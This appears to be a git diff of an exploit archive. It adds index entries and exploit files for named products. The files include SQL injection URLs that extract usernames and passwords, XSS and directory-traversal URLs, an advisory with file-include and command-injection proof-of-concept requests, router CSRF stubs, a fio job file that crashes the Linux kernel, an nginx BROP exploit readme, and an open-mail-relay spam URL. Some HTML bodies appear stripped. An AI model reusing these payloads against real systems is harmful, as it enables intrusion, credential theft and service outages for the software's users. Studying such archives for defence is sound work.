32303,platforms/linux/remote/32303.txt,"Mono <= 2.0 'System.Web' HTTP Header Injection Vulnerability",2008-08-20,"Juraj Skripsky",linux,remote,0 @@ -29082,10 +29084,10 @@ id,file,description,date,author,platform,type,port 32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 32308,platforms/php/webapps/32308.txt,"GenPortal 'buscarCat.php' Cross-Site Scripting Vulnerability",2008-09-01,sl4xUz,php,webapps,0 -32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script 'landsee.php' SQL Injection Vulnerability",2008-08-29,"Hussin X",php,webapps,0 +32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection Vulnerability",2008-08-29,"Hussin X",php,webapps,0 32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 'APPEND' Command Remote Denial of Service Vulnerability",2008-09-02,Antunes,multiple,dos,0 -32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 Malformed 'title' Tag Remote Denial of Service Vulnerability",2008-09-02,Exodus,multiple,dos,0 -32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 'page' Parameter Cross-Site Scripting Vulnerability",2008-09-02,Am!r,php,webapps,0 +32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 - Malformed 'title' Tag Remote Denial of Service Vulnerability",2008-09-02,Exodus,multiple,dos,0 +32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Parameter Cross-Site Scripting Vulnerability",2008-09-02,Am!r,php,webapps,0 32313,platforms/php/webapps/32313.txt,"OpenDB 1.0.6 user_admin.php user_id Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 listings.php title Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 user_profile.php redirect_url Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 @@ -29120,19 +29122,19 @@ id,file,description,date,author,platform,type,port 32345,platforms/windows/remote/32345.cpp,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (2)",2008-09-08,Ciph3r,windows,remote,0 32346,platforms/php/webapps/32346.txt,"E-Php B2B Trading Marketplace Script 'listings.php' SQL Injection Vulnerability",2008-09-07,r45c4l,php,webapps,0 32347,platforms/php/webapps/32347.txt,"UBB.threads 7.3.1 'Forum[]' Array SQL Injection Vulnerability",2008-09-02,"James Bercegay",php,webapps,0 -32348,platforms/linux/dos/32348.txt,"MySQL <= 6.0.4 Empty Binary String Literal Remote Denial Of Service Vulnerability",2008-03-28,"Kay Roepke",linux,dos,0 -32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 -32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 mDNSResponder NULL Pointer Dereference Denial of Service Vulnerability",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 -32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 'index.php' Multiple Local File Include Vulnerabilities",2008-09-10,SirGod,php,webapps,0 -32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script 'applynow.php' SQL Injection Vulnerability",2008-09-10,InjEctOr5,php,webapps,0 -32353,platforms/php/webapps/32353.txt,"Horde Application Framework <= 3.2.1 Forward Slash Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0 -32354,platforms/php/webapps/32354.txt,"Horde 3.2 MIME Attachment Filename Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0 +32348,platforms/linux/dos/32348.txt,"MySQL <= 6.0.4 - Empty Binary String Literal Remote Denial Of Service Vulnerability",2008-03-28,"Kay Roepke",linux,dos,0 +32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 +32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service Vulnerability",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 +32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Include Vulnerabilities",2008-09-10,SirGod,php,webapps,0 +32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script 'applynow.php' - SQL Injection Vulnerability",2008-09-10,InjEctOr5,php,webapps,0 +32353,platforms/php/webapps/32353.txt,"Horde Application Framework <= 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0 +32354,platforms/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0 -32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 +32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 -32360,platforms/php/webapps/32360.txt,"NooMS 1.1 smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 -32361,platforms/php/webapps/32361.txt,"NooMS 1.1 search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 +32360,platforms/php/webapps/32360.txt,"NooMS 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 +32361,platforms/php/webapps/32361.txt,"NooMS 1.1 - search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0 32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 @@ -29144,3 +29146,41 @@ id,file,description,date,author,platform,type,port 32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0 32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0 32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22 +32374,platforms/hardware/remote/32374.txt,"Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,hardware,remote,0 +32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0 +32381,platforms/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow Vulnerability",2008-09-12,0x90,multiple,dos,0 +32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay Vulnerability",2008-09-15,"Eric Beaulieu",multiple,remote,0 +32383,platforms/php/webapps/32383.txt,"phpMyAdmin <= 3.2 - 'server_databases.php' Remote Command Execution Vulnerability",2008-09-15,"Norman Hippert",php,webapps,0 +32384,platforms/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service Vulnerability",2007-07-20,"Jens Axboe",linux,dos,0 +32385,platforms/hardware/webapps/32385.txt,"Dlink DIR-600L Hardware Version AX Firmware Version 1.00 - CSRF Vulnerability",2014-03-20,"Dhruv Shah",hardware,webapps,0 +32386,platforms/multiple/dos/32386.txt,"Unreal Engine 'UnChan.cpp' Failed Assertion Remote Denial of Service Vulnerability",2008-09-16,"Luigi Auriemma",multiple,dos,0 +32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross Site Scripting Vulnerability",2008-09-16,"John Cobb",php,webapps,0 +32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection Vulnerability",2008-09-17,"Hussin X",php,webapps,0 +32389,platforms/php/webapps/32389.txt,"Quick Cart <= 3.1 - 'admin.php' Cross Site Scripting Vulnerability",2008-09-17,"John Cobb",php,webapps,0 +32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery Vulnerability (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 +32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery Vulnerability (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 +32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass and SQL Injection Vulnerabilities",2008-09-17,JosS,php,webapps,0 +32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution Vulnerability",2008-09-17,"Eli the Bearded",solaris,remote,0 +32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System 'Error.asp' Cross-Site Scripting Vulnerability",2008-09-18,Lagon666,asp,webapps,0 +32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 Database Disclosure Vulnerability",2008-09-19,r45c4l,php,webapps,0 +32396,platforms/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 'login.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps,0 +32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 Multiple SQL Injection Vulnerabilities",2008-09-19,"Jan Van Niekerk",php,webapps,0 +32398,platforms/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 'add_calendars.php' Cross Site Scripting Vulnerability",2008-09-21,"DigiTrust Group",php,webapps,0 +32399,platforms/unix/remote/32399.txt,"Multiple Vendor FTP Server Long Command Handling Security Vulnerability",2008-09-20,"Maksymilian Arciemowicz",unix,remote,0 +32400,platforms/multiple/dos/32400.html,"Foxmail Email Client 6.5 'mailto' Buffer Overflow Vulnerability",2008-09-22,sebug,multiple,dos,0 +32401,platforms/asp/webapps/32401.txt,"rgb72 WCMS 1.0 'index.php' SQL Injection Vulnerability",2008-09-22,"CWH Underground",asp,webapps,0 +32402,platforms/php/webapps/32402.txt,"UNAK-CMS Cookie Authentication Bypass Vulnerability",2008-09-22,Ciph3r,php,webapps,0 +32403,platforms/php/webapps/32403.txt,"MapCal 0.1 'id' Parameter SQL Injection Vulnerability",2008-09-22,0x90,php,webapps,0 +32404,platforms/php/webapps/32404.html,"fuzzylime (cms) 3.0 'usercheck.php' Cross Site Scripting Vulnerability",2008-09-22,"Fabian Fingerle",php,webapps,0 +32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 advanced_search_result.php keywords Parameter XSS",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 'PHPSESSID' Session Fixation Vulnerability",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS 'tienda.php' SQL Injection Vulnerability",2008-09-21,r45c4l,php,webapps,0 +32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 'atknodetype' Parameter Cross Site Scripting Vulnerability",2008-09-20,"Rohit Bansal",php,webapps,0 +32410,platforms/php/webapps/32410.txt,"6rbScript 'cat.php' SQL Injection Vulnerability",2008-09-22,"Karar Alshami",php,webapps,0 +32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 'admin.php' Cross Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0 +32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0 +32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0 +32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0 +32416,platforms/php/remote/32416.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0 +32417,platforms/php/remote/32417.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 diff --git a/platforms/asp/webapps/32394.txt b/platforms/asp/webapps/32394.txt new file mode 100755 index 000000000..e97f1ea13 --- /dev/null +++ b/platforms/asp/webapps/32394.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31242/info + +Sama Educational Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/Error.asp?Message=XSS \ No newline at end of file diff --git a/platforms/asp/webapps/32401.txt b/platforms/asp/webapps/32401.txt new file mode 100755 index 000000000..fd6e269fb --- /dev/null +++ b/platforms/asp/webapps/32401.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31298/info + +rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +rgb72 WCMS 1.0b is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,3,f_user,f_password,6,7,8+from+upass%00 + +http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00 \ No newline at end of file diff --git a/platforms/asp/webapps/32412.txt b/platforms/asp/webapps/32412.txt new file mode 100755 index 000000000..5ba6a1164 --- /dev/null +++ b/platforms/asp/webapps/32412.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31338/info + +Omnicom Content Platform is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +To exploit this issue an attacker may need administrative privileges to the affected application. + +Exploiting the issue may allow the attacker to obtain sensitive information that could aid in further attacks. + +Omnicom Content Platform 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/ocp/admin/fileKontrola/browser.asp?root=/ \ No newline at end of file diff --git a/platforms/hardware/remote/32374.txt b/platforms/hardware/remote/32374.txt new file mode 100755 index 000000000..eae68a88c --- /dev/null +++ b/platforms/hardware/remote/32374.txt @@ -0,0 +1,231 @@ +Document Title: +=============== +Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1229 + + +Release Date: +============= +2014-03-19 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1229 + + +Common Vulnerability Scoring System: +==================================== +6.8 + + +Product & Service Introduction: +=============================== +Why carry a physical USB drive around wherever you go, cluttering up your key ring? Instead, this simple, convenient app converts your +iOS device into a wireless hard drive that works over WiFi! Simple. Powerful. Convenient. Wireless Drive: One of those apps you`ll end +up using all the time! Features: + +- Transfer files without limitation +- Support files in any format and size +- Use WiFi or iTunes File Sharing to transfer files between your iOS device and computer +- Perfect app for transporting large collections of video +- Use it to transfer work documents from office to home, simple and easily + +(Copy of the Homepage: https://itunes.apple.com/de/app/wireless-drive-transfer-share/id569832333 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official OnDemandWorld Wireless Drive v1.1.0 mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-03-19: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +OnDemandWorld +Product: Wireless Drive - Transfer & Share Files over WiFi 1.1.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official OnDemandWorld Wireless Drive v1.1.0 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path +commands to compromise the web-application or mobile device. + +The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to inject own files with malicious +`filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and the request +method is POST. The local file/path include execution occcurs in the main file dir list. The security risk of the local file include web vulnerability +is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8. + +Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth. +Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Upload file + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Upload > Menu File Dir List (http://localhost:4096) + + + +1.2 +A local command/path injection web vulnerabilities has been discovered in the official OnDemandWorld Wireless Drive v1.1.0 iOS mobile web-application. +A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the vulnerable `[foldername]` value of the wifi file dir list module. Local attackers are able to inject own malicious +system specific commands or path value requests in the vulnerable foldername value. The injection requires a active sync with the wifi app stored folders. +The execution of the local command inject via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of +the local command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7. + +Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to +compromise the mobile iOS application or the connected device components. + +Request Method(s): + [+] Sync + +Vulnerable Parameter(s): + [+] foldername (path value) + +Affected Module(s): + [+] Index- File Dir Listing + [+] Sub Folder/Category - File Dir Listing + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability can be exploited by remote attackers without user interaction and with low privileged web-interface account. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: Upload File > filename [Sub Dir] + + +<../[LOCAL FILE INCLUDE VULNERABILITY!]"> + 0.5 KB 2014-03-19 11:55:51 +1.png + 0.5 KB 2014-03-19 11:53:05 +Sample.jpg + 175.2 KB 2013-02-23 18:48:42 +

+ +--- PoC Session Logs [POST] --- + + +POST http://localhost:4096/5FCAF1DE-6D23-463B-ABE0-FFB0191DF038 Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt] + Request Header: + Host[localhost:4096] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; + +rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer + +[http://localhost:4096/5FCAF1DE-6D23-463B-ABE0-FFB0191DF038] + POST-Daten: + POST_DATA[-----------------------------23750323325183 +Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]_*" +Content-Type: image/png + + +1.2 +The command inject vulnerability can be exploited by local attackers with physical device access or low privileged user account and without user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: Sync > foldername [Index] + + + +./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-Folder2014-03-19 + + + +Solution - Fix & Patch: +======================= +1.1 +The local command inject web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request. +Encode also the filename index listing to prevent execution of malicious commands, injection of script codes or file include attacks. + +1.2 +The local command inject web vulnerability can be patched by a secure parse and restriction of the rename and foldername value in the wifi app. +Encode also the output index list were the folders will become visible after the sync. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability in the wifi exchange interface is estimated as high(+). + +1.2 +The local command inject vulnerability in the foldername value via sync is estimated as high(-). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/hardware/remote/32390.html b/platforms/hardware/remote/32390.html new file mode 100755 index 000000000..a940ec123 --- /dev/null +++ b/platforms/hardware/remote/32390.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31218/info + +The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. + +Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks. + +The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected. + +
\ No newline at end of file diff --git a/platforms/hardware/remote/32391.html b/platforms/hardware/remote/32391.html new file mode 100755 index 000000000..4983cbc69 --- /dev/null +++ b/platforms/hardware/remote/32391.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31218/info + +The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. + +Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks. + +The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected. + + \ No newline at end of file diff --git a/platforms/hardware/webapps/32385.txt b/platforms/hardware/webapps/32385.txt new file mode 100755 index 000000000..61a42d47b --- /dev/null +++ b/platforms/hardware/webapps/32385.txt @@ -0,0 +1,77 @@ +#################################################################################### + +# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00 +CSRF Vulnerability +# Google Dork: N/A +# Date: 20/03/2014 +# Exploit Author: Dhruv Shah +# Vendor Homepage: +http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router +# Software Link: N/A +# Hardware Version:E4 + +# Firmware Version:5.10 +# Tested on: Router Web Server +# CVE : N/A + +################################################################################### + + Cross Site Request Forgery + + + +This Modem's Web Application , suffers from Cross-site request forgery + +through which attacker can manipulate user data via sending him malicious + +craft url. + + + +The Modems's Application not using any security token to prevent it + +against CSRF. You can manipulate any userdata. PoC and Exploit to change + +user password: + + +In the POC the IP address in the POST is the modems IP address. + + + + + + + + + + + + + +
+ + + + + + +______________________ + +*Dhruv Shah* *aka Snypter* + +Blogger | Researcher | Consultant | Writer +Youtube | +Facebook| +Linkedin | +Twitter| +Blog diff --git a/platforms/linux/dos/32384.txt b/platforms/linux/dos/32384.txt new file mode 100755 index 000000000..f75e0ff3a --- /dev/null +++ b/platforms/linux/dos/32384.txt @@ -0,0 +1,65 @@ +source: http://www.securityfocus.com/bid/31201/info + +The Linux kernel is prone to a local denial-of-service vulnerability. + +Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. + +This issue affects versions prior to Linux kernel 2.6.22.2. + +[global] +bs=8k +iodepth=1024 +iodepth_batch=60 +randrepeat=1 +size=1m +directory=/home/oracle +numjobs=20 +[job1] +ioengine=sync +bs=1k +direct=1 +rw=randread +filename=file1:file2 +[job2] +ioengine=libaio +rw=randwrite +direct=1 +filename=file1:file2 +[job3] +bs=1k +ioengine=posixaio +rw=randwrite +direct=1 +filename=file1:file2 +[job4] +ioengine=splice +direct=1 +rw=randwrite +filename=file1:file2 +[job5] +bs=1k +ioengine=sync +rw=randread +filename=file1:file2 +[job7] +ioengine=libaio +rw=randwrite +filename=file1:file2 +[job8] +ioengine=posixaio +rw=randwrite +filename=file1:file2 +[job9] +ioengine=splice +rw=randwrite +filename=file1:file2 +[job10] +ioengine=mmap +rw=randwrite +bs=1k +filename=file1:file2 +[job11] +ioengine=mmap +rw=randwrite +direct=1 +filename=file1:file2 \ No newline at end of file diff --git a/platforms/linux/remote/32277.txt b/platforms/linux/remote/32277.txt new file mode 100755 index 000000000..dcb3c972f --- /dev/null +++ b/platforms/linux/remote/32277.txt @@ -0,0 +1,21 @@ +nginx <= 1.4.0 exploit for CVE-2013-2028 +by sorbo +Fri Jul 12 14:52:45 PDT 2013 + +./brop.rb 127.0.0.1 + +for remote hosts: +./frag.sh ip +./brop.rb ip + +rm state.bin when changing host (or relaunching nginx with canaries) + +scan.py will find servers, reading IPs from ips.txt + + + +This is a generic exploit for 64-bit nginx which uses a new attack technique (BROP) that does not rely on a particular target binary. It will work on any distro and even compiled from source installations. + + + +Exploit: http://www.exploit-db.com/sploits/32277.tgz \ No newline at end of file diff --git a/platforms/multiple/dos/32381.js b/platforms/multiple/dos/32381.js new file mode 100755 index 000000000..1d49394e9 --- /dev/null +++ b/platforms/multiple/dos/32381.js @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/31155/info + +Avant Browser is prone to an integer-overflow vulnerability that occurs in the JavaScript engine. + +An attacker can exploit this issue by enticing an unsuspecting victim to view a malicious site. + +Successfully exploiting this issue may allow attackers to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. + +Avant Browser 11.7 Build 9 is vulnerable; other versions may also be affected. + +NOTE: This vulnerability may be related to the issue described in BID 14917 (Mozilla Browser/Firefox JavaScript Engine Integer Overflow Vulnerability). + + diff --git a/platforms/multiple/dos/32386.txt b/platforms/multiple/dos/32386.txt new file mode 100755 index 000000000..d00d56270 --- /dev/null +++ b/platforms/multiple/dos/32386.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/31205/info + +Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. + +An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users. + +The following applications using the engine are vulnerable: + +Unreal Tournament 3.1.3 +Unreal Tournament 2003 +Unreal Tournament 2004 +Dead Man's Hand +Pariah +WarPath +Postal 2 +Shadow Ops + +http://www.exploit-db.com/sploits/32386.zip diff --git a/platforms/multiple/dos/32400.html b/platforms/multiple/dos/32400.html new file mode 100755 index 000000000..8c0b35bc0 --- /dev/null +++ b/platforms/multiple/dos/32400.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31294/info + +Foxmail Email Client is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +Foxmail Email Client 6.5 is vulnerable; other versions may also be affected. + +

Author:friddy QQ:568623

Result:Program Crash
ClickME >Clickme \ No newline at end of file diff --git a/platforms/multiple/remote/32382.txt b/platforms/multiple/remote/32382.txt new file mode 100755 index 000000000..5140019e8 --- /dev/null +++ b/platforms/multiple/remote/32382.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31178/info + +Accellion File Transfer Appliance is prone to an open-email-relay vulnerability. + +An attacker could exploit this issue by constructing a script that would send unsolicited spam to an unrestricted amount of email addresses from a forged email address. + +This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189. + +https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM

SPAM_ATTACK

